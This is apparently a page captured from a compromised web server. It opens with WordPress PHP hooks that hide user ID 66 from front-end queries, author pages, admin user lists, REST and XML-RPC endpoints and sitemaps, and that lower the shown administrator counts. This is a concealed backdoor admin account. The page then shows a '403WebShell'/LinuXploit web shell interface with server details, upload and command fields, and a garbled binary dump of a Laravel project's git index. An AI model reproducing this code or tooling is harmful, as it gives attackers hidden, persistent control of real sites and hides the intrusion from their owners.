add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/planetscifi/.git/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/planetscifi/.git/index
DIRC�h���.#�h���.#�4�����;�$-E������j��F��	.DS_Storeh���.#�h���.#�4������
�\VY�tm�fh��
.editorconfigh���.#�h���.#�4�����I�e�����{,��*@g�.env.exampleh���.#�h���.#�4��������9meY~��r�s؛
��.gitattributesh���.#�h���.#�4�������x�Q�r�FEW�
�r�΄F
.gitignoreh���.#�h���.#�4�����
L&�2��^N)�ަQi�1��o	README.mdh���.#�h���.#����������)ѭ�(�-�"PE�
app/.DS_Storeh���.2�Ih���.2�I������_�_KV��J�!�Q1�;���A"app/Console/Commands/ImportCSV.phph���.2�Ih���.2�I������=湖���i�q*���5'j app/Console/Kernel.phph���.2�Ih���.2�I������V�&@]Lq�K:�a��1��n0�app/Exceptions/Handler.phph���.2�Ih���.2�I������f���R	R�Ru6o)app/Http/.DS_Storeh���.2�Ih���.2�I�������5Y�Lh���Yy0��nm78_7app/Http/Controllers/Auth/ConfirmPasswordController.phph���.2�Ih���.2�I�������F\9�n���s�E �(_y6app/Http/Controllers/Auth/ForgotPasswordController.phph���.2�Ih���.2�I�������+o������@��Q/o�-app/Http/Controllers/Auth/LoginController.phph���.2�Ih���.2�I������m�~�7�V��ޟ'G�U�b�:0app/Http/Controllers/Auth/RegisterController.phph���.2�Ih���.2�I��������[$�-Ls��||[`vkr��5app/Http/Controllers/Auth/ResetPasswordController.phph���.2�Ih���.2�I������/#�:��<�v���s��34app/Http/Controllers/Auth/VerificationController.phph���.2�Ih���.2�I���������/�bE�*���wb�g#app/Http/Controllers/Controller.phph���.B�h���.B�������T�ۻSK�����L��1���L'app/Http/Controllers/HomeController.phph���.B�h���.B�������X0c'.G��T�ƀ��b)k�v)app/Http/Controllers/PocketController.phph���.B�h���.B�������
6��d�l�e*�;�R-��B]app/Http/Kernel.phph���.B�h���.B����������dG�ˈ�hO	�:7U�p4D$app/Http/Middleware/Authenticate.phph���.B�h���.B�������3�v������!Ճ�":�$&�&app/Http/Middleware/EncryptCookies.phph���.B�h���.B�������nt�٩��

t�pw)�,��\8app/Http/Middleware/PreventRequestsDuringMaintenance.phph���.B�h���.B���������njNS�܁��4(��{�C[�/app/Http/Middleware/RedirectIfAuthenticated.phph���.B�h���.B�������/FB�/w��|
�Գ/v"!app/Http/Middleware/SetLocale.phph���.B�h���.B�������}��ܪ��s��=u{�jm0~�#app/Http/Middleware/TrimStrings.phph���.B�h���.B�������{�ŋ�Χ��Q2���6�0,"app/Http/Middleware/TrustHosts.phph���.B�h���.B��������3�c̞���5�JC��{��q$app/Http/Middleware/TrustProxies.phph���.B�h���.B��������	;�J�m�m���=�۫)app/Http/Middleware/ValidateSignature.phph���.B�h���.B�������@��R"��X/{M:c����'app/Http/Middleware/VerifyCsrfToken.phph���.B�h���.B��������\���i�C�T
9K�*�y�app/Models/Bookstore.phph���.B�h���.B�������]!T�ť�ۛYA��8�k~app/Models/Canva.phph���.B�h���.B�������dܓ�eiL��{A�>�q2�Capp/Models/Item.phph���.QH�h���.QH�������Mp�h�.��#��	���N<app/Models/User.phph���.QH�h���.QH������iE.ke����ê���:-84$app/Providers/AppServiceProvider.phph���.QH�h���.QH������Tul���ϴ�t����� �-�%app/Providers/AuthServiceProvider.phph���.QH�h���.QH������g+�O]���ttNI�DKd_�*app/Providers/BroadcastServiceProvider.phph���.QH�h���.QH������t-e���G~
��M:�
��y&app/Providers/EventServiceProvider.phph���.QH�h���.QH��	����M��\"bņ�	��)79�z��&app/Providers/RouteServiceProvider.phph���.QH�h���.QH�4������g�2�>+Qa"��p�3zZ�artisanh���.QH�h���.QH������T~��Y�{�'�33��7�bootstrap/app.phph���.QH�h���.QH��
����ַ�2�G�HÙM�܆�CqMbootstrap/cache/.gitignoreh���.QH�h���.QH�4��������B�������/�
composer.jsonh���.o�]h���.o�]4�����
�6�m�O��9��3��Y�
composer.lockh���.o�]h���.o�]�����ub��"�X�z�qlݜ2��Fconfig/app.phph���.o�]h���.o�]�����9�H�]�@x9�h� ��V�KRconfig/auth.phph���.o�]h���.o�]�����c$HS��q(i��*�AA/�5config/broadcasting.phph���.o�]h���.o�]�����
	�"�8����7���=y��config/cache.phph���.o�]h���.o�]�����N�9�ڦ=Ӥ�v��(�l��nconfig/cors.phph���.o�]h���.o�]������zь��G'��K�u4�Q�<config/database.phph���.o�]h���.o�]�����	B�����8L�;_����}config/filesystems.phph���.o�]h���.o�]�����X���Е�g���ë�1config/hashing.phph���.o�]h���.o�]�����M�M'c����葏`$�A�S�hconfig/logging.phph���.o�]h���.o�]������蔲����p���W�_�config/mail.phph���.�h���.������M��M8|�j*�㻰O��F�!config/models.phph���.�h���.������
wưTԈh�x.�Jrad� ��config/queue.phph���.�h���.�������5�[1��$)�TY4�d��config/sanctum.phph���.�h���.�������
�S�%E|������̩�}�config/services.phph���.�h���.������G��ܮ�R<X~:�vʴ�&~�'config/session.phph���.�h���.������"���2X�!���z� ��config/view.phph���.�h���.�� ����
��<��'I�;�v
(2Q��database/.gitignoreh���.�h���.��"����3XA��u!�U�נ,�6X���"database/factories/UserFactory.phph���.�h���.��$�����DO���2�z���	��̯@<database/migrations/2014_10_12_000000_create_users_table.phph���.�h���.��%�������"�Z��˩� И�j�N�Ldatabase/migrations/2014_10_12_100000_create_password_reset_tokens_table.phph���.�h���.��&��������>��a�����
��}Fdatabase/migrations/2014_10_12_100000_create_password_resets_table.phph���.�h���.��'����$���`�	\3 9>fަBdatabase/migrations/2019_08_19_000000_create_failed_jobs_table.phph���.�h���.��(����X�(����|'$����s�3�ڇMdatabase/migrations/2019_12_14_000001_create_personal_access_tokens_table.phph���.�h���.��)����9\�4�
��R�/�	!�-��*!Adatabase/migrations/2024_11_06_183236_create_bookstores_table.phph���.�h���.��=�����gp�޺U�m��c�;9�{�[database/migrations/2025_08_01_055241_update_bookstores_table_change_description_to_url.phph���.�h���.��+����ש�Q��2N'�r*g�@�\>�#database/seeders/DatabaseSeeder.phph���.�Q�h���.�Q�4�������f��/#T�ժ�@4w�(���p�package-lock.jsonh���.�Q�h���.�Q�4�����}��q��w���L�G����H<package.jsonh���.�Q�h���.�Q�4�����n��qK������>�glKg�c�phpunit.xmlh���.�Q�h���.�Q��-�����;����EH������&xpublic/.DS_Storeh���.�Q�h���.�Q��.����[:�^'�ۀ��!��z˴���public/.htaccessh���.��-h���.��-�0�����KESp��+���TMoE�_��a1public/css/styles.cssh���.��-h���.��-�1�����⛲��CK�)�wZ���S�public/favicon.icoh���.��rh���.��r�3����^��C����^�5�R2�����public/favicons/globe.pngh���.��rh���.��r�4����ǎ��"��;(aZ�+�W0*�upublic/favicons/globe1.pngh���.��h���.���5��������4�i.�:
���m^��public/favicons/globe2.pngh���.�Z�h���.�Z��6��������ZD����p��~It�public/favicons/globe3.pngh���.�Z�h���.�Z��7���������F�0��0X�M\i���|public/favicons/globe4.pngh���.ڝAh���.ڝA�8������Bն�[S��m�]{$'<�public/favicons/globe5.pngh���.�߆h���.�߆�9�����@솈Ita�Bh�S�7��public/favicons/globe6.pngh���.�߆h���.�߆�;������z�鰊�ے�}썚���Cpublic/fonts/.DS_Storeh���/�Uh���/�U�<����
a�4Zo�ղc.
Y���2��)public/fonts/Baloo2-VariableFont_wght.ttfh���/&�h���/&��=����U$V)7���)4��⚽݇SN'public/fonts/barlow-v12-latin-600.woff2h���/&�h���/&��>����R�D���vC�>J�
�t$Di$�+public/fonts/barlow-v12-latin-regular.woff2h���/&�h���/&��?����6�,�B�A3���l��5�ϑ:�
,public/fonts/public-sans-v18-latin-100.woff2h���/&�h���/&��@����:��˲
-m(*����N�2public/fonts/public-sans-v18-latin-100italic.woff2h���/&�h���/&��A����9 4�22i�J�?_4��!2��,public/fonts/public-sans-v18-latin-200.woff2h���/&�h���/&��B����<�e>�Y}x�5�>-�{[]s��2public/fonts/public-sans-v18-latin-200italic.woff2h���/&�h���/&��C����8�L�}+�Ja�Tu;L; �F,public/fonts/public-sans-v18-latin-300.woff2h���/&�h���/&��D����<��B\�JI�]��ǵ[2public/fonts/public-sans-v18-latin-300italic.woff2h���/&�h���/&��E����9@�c�&E��G�<�->a�lb,public/fonts/public-sans-v18-latin-500.woff2h���/&�h���/&��F����=�����mK"0
�����2public/fonts/public-sans-v18-latin-500italic.woff2h���/&�h���/&��G����9����߉޳v�e�5�A,public/fonts/public-sans-v18-latin-600.woff2h���/&�h���/&��H����=�a@\�dSɁ�/��:m_se2public/fonts/public-sans-v18-latin-600italic.woff2h���/6*�h���/6*��I����9y��\4V|𮐙�n-칚�,public/fonts/public-sans-v18-latin-700.woff2h���/6*�h���/6*��J����=��
�d{Ct�&�WB��Ͳ2public/fonts/public-sans-v18-latin-700italic.woff2h���/6*�h���/6*��K����9��Sj��O�~
�PS,public/fonts/public-sans-v18-latin-800.woff2h���/6*�h���/6*��L����=�I9���@��9�٢�ѯ2public/fonts/public-sans-v18-latin-800italic.woff2h���/6*�h���/6*��M����6����*P�^���•�*@�,public/fonts/public-sans-v18-latin-900.woff2h���/6*�h���/6*��N����:��~�-,��Ɍ�Tn4F�W�Z�2public/fonts/public-sans-v18-latin-900italic.woff2h���/6*�h���/6*��O����=q��A�@��q���ɲ�L�/public/fonts/public-sans-v18-latin-italic.woff2h���/6*�h���/6*��P����9(�ں�}���,,�y��hH30public/fonts/public-sans-v18-latin-regular.woff2h���2�p�h���2�p��R������ā$X̝����῍Y�y��1W"public/images/8081_earthmap10k.jpgh���2�Wh���2�W�S����9��˚,�g�)I�=~�u�public/images/earth.jpgh���3�lh���3�l�T����"�5�K},W90����l�}	��public/images/earth.pngh���3�lh���3�l�U����
��%��Dv(%�L�:P�z$�public/images/globe_sf.jpgh���3%@�h���3%@��V������q�.[K�{��/	�-0cpublic/images/globe_sf.pngh���34��h���34���W������Rd"6��Q�
)~�K��H�!public/images/jngl_logo_n_512.pngh���34��h���34���X�������yS��9X/�3�5�]�� public/images/logo_n_512_w.pngh���3C�;h���3C�;�Y�����i�����oD�O^�(public/index.phph���3C�;h���3C�;�Z�����6(o0��dh�TF�T}public/robots.txth���3C�;h���3C�;�\������A��QӢI����$^4yresources/.DS_Storeh���3C�;h���3C�;�^�����⛲��CK�)�wZ���S�resources/css/app.cssh���3C�;h���3C�;�`�����j
�p��I ��:�C@resources/js/app.jsh���3C�;h���3C�;�a�����F��=; �?%�5���)pB�D�resources/js/bootstrap.jsh���3C�;h���3C�;��������EW��/�vi�6�U�id*uresources/lang/.DS_Storeh���3C�;h���3C�;�d����oM�TO8��;��!0$,h�<resources/lang/de/messages.phph���3C�;h���3C�;�f������}��d��@
_g0����{�resources/lang/en/messages.phph���3C�;h���3C�;�h������������Bh�_�(�resources/lang/es/messages.phph���3C�;h���3C�;�j����3Q������t�	$����a�resources/lang/fr/messages.phph���3C�;h���3C�;�l������~�N�"G�$^����
�hresources/lang/it/messages.phph���3C�;h���3C�;�n�����D0�:��q-��vRu⼜resources/sass/_variables.scssh���3S�h���3S��o�����a>#&��(ׂè�,鶘�resources/sass/app.scssh���3S�h���3S��q����/Qt�c{�m.��o�resources/views/.DS_Storeh���3S�h���3S��s����
��@��]_oSf��0�NbF$resources/views/auth/login.blade.phph���3S�h���3S��u��������:G�|V(���Hd�0resources/views/auth/passwords/confirm.blade.phph���3S�h���3S��v����fѬx1��W��z���?H�I�.resources/views/auth/passwords/email.blade.phph���3S�h���3S��w�������lej+�����_�ؐ�.resources/views/auth/passwords/reset.blade.phph���3S�h���3S��x����,�ѩJ�=��;}#,_�)�c'resources/views/auth/register.blade.phph���3S�h���3S��y����n�����Oia&���Yi\�4[%resources/views/auth/verify.blade.phph���3S�h���3S��"����-�.��	�G���6�Eɗ�m$resources/views/bookstores.blade.phph���3S�h���3S��z����0��G��
9�﹓ص©�2u resources/views/canvas.blade.phph���3S�h���3S��{�����4Fk���;�<���2��Scresources/views/home.blade.phph���3S�h���3S��}�����|��E�=[�#
Wfx���%resources/views/layouts/app.blade.phph���3S�h���3S��~����� 	�~q�m��i�*ū�po��&resources/views/layouts/capp.blade.phph���3S�h���3S�������0��0wQޜ�.�|��,��� resources/views/mylist.blade.phph���3S�h���3S�������
]��oU\���2vD��Ÿ&resources/views/welcome.blade copy.phph���3bI�h���3bI�������0U��+�>WB���]���w"!resources/views/welcome.blade.phph���3bI�h���3bI�������B"�\��t���{
v�aT���"resources/views/welcome3.blade.phph���3bI�h���3bI�������
]��oU\���2vD��Ÿ#resources/views/welcome4.bladed.phph���3bI�h���3bI��������\�l����[f1Ek!��;TK�#resources/views/zukuenfte.blade.phph���3bI�h���3bI�������:��7�UW%���"R���/routes/api.phph���3bI�h���3bI�������.]E���	z�]��<���routes/channels.phph���3bI�h���3bI�������P�_L�'�\ ��{D߷�#���routes/console.phph���3bI�h���3bI�������Q�s
���;���S��M_��"routes/web.phph���3bI�h���3bI��������-�L��.�7�M�jJi6��?storage/.DS_Storeh���3bI�h���3bI��������H�V8i}��(��2N�y�storage/app/.gitignoreh���3bI�h���3bI�������ַ�2�G�HÙM�܆�CqMstorage/app/public/.gitignoreh���3bI�h���3bI�������w�G+S������RuZ5G�|storage/framework/.gitignoreh���3bI�h���3bI��������ͩ�8	s�:@�b������"storage/framework/cache/.gitignoreh���3bI�h���3bI�������ַ�2�G�HÙM�܆�CqM'storage/framework/cache/data/.gitignoreh���3bI�h���3bI�������ַ�2�G�HÙM�܆�CqM%storage/framework/sessions/.gitignoreh���3bI�h���3bI�������ַ�2�G�HÙM�܆�CqM$storage/framework/testing/.gitignoreh���3bI�h���3bI�������ַ�2�G�HÙM�܆�CqM"storage/framework/views/.gitignoreh���3bI�h���3bI�������ַ�2�G�HÙM�܆�CqMstorage/logs/.gitignoreh���3q�h���3q�������w�h0)θ}�{��;�1�`4tests/CreatesApplication.phph���3q�h���3q�������g�d�N+~�~���32s�0��tests/Feature/ExampleTest.phph���3q�h���3q��������)2Ԧ�eT��ީN1�5�e�tests/TestCase.phph���3q�h���3q��������Ws�ηq�vR
Z��^��x1�tests/Unit/ExampleTest.phph���3q�h���3q�4�����8ۿ30�)���k>��&b�9� vite.config.jsTREE*165 9
�i��8�R���	��O{��app34 5
�����U�� �A������sHttp21 2
����DఊL�6#0%#�w��Middleware10 0
�2�?�n�#��G�`��Controllers9 1
W]_D��iJh��ơ�d?�Auth6 0
hj�3L�s�{�v��j"�Models4 0
�&��h�_ݦ�7OUe|�%�Console2 1
��p\b�v����2�Commands1 0
�έޫ�|#�䑔�(�p~^JProviders5 0
A�����`���0d�wc�Exceptions1 0
��g�#��W%V�a�sF��Ȏ�tests4 2
��Kr$o�+�d�� V���HUnit1 0
P�
�eL��Y�W�����$8Feature1 0
L�6J����3M�U���	h_{config16 0
�'{/qK,�s
���ڌ��s=public42 4
n�r&Y/y� ���7�.�s�css1 0
:%Vk#U'�da��ʲz�D�fonts22 0
I(��흍정���,\5��=images7 0
�{d=�`��S����F=���favicons7 0
���Ϫ�B��Ml�8]e�Droutes4 0
�����Q�D�أ�³storage10 3
`Q�H4]�czc�9s��E�xapp2 1
�m��k�Y<�	a��aT��'ypublic1 0
/J����z�T���֛���.logs1 0
/J����z�T���֛���.framework6 4
#_!�&e��#p�5Ғh'cache2 1
�וMql\m�����ˢ���data1 0
/J����z�T���֛���.views1 0
/J����z�T���֛���.testing1 0
/J����z�T���֛���.sessions1 0
/J����z�T���֛���.database10 3
���s��0v�1�K�Y�seeders1 0
,�&
��M�-�
5�~|k�3factories1 0
`m#FTaU`�*��x�-migrations7 0
/9C��*�,ȜQb�&e9��bootstrap2 1
\Ð�ҼK�9��qpK\��cache1 0
/J����z�T���֛���.resources30 5
xyȣ��2`!�����zjs2 0
؉	^�[�W��1E��|��css1 0
1��Nm@�(ayr����llang6 5
�wb��ys9_��v_kU�-��de1 0
�Π������nъ����en1 0
���тzb�&� 5���Mes1 0
c3�n��"P%�����|�fr1 0
�
��	r[��tФ*��۷Yit1 0
)��lu���D��!j�u`sass2 0
��q)E�rq�*�O7Uviews18 2
0����I`Q�=,�K�aauth6 1
7�
$$��7�n�fIfE���passwords3 0
��6>֯IΘ)�,J@i̢layouts2 0
�ot����Mi
|����i�+��nL��>�G%y&�A޾%

Youez - 2016 - github.com/yon3zu
LinuXploit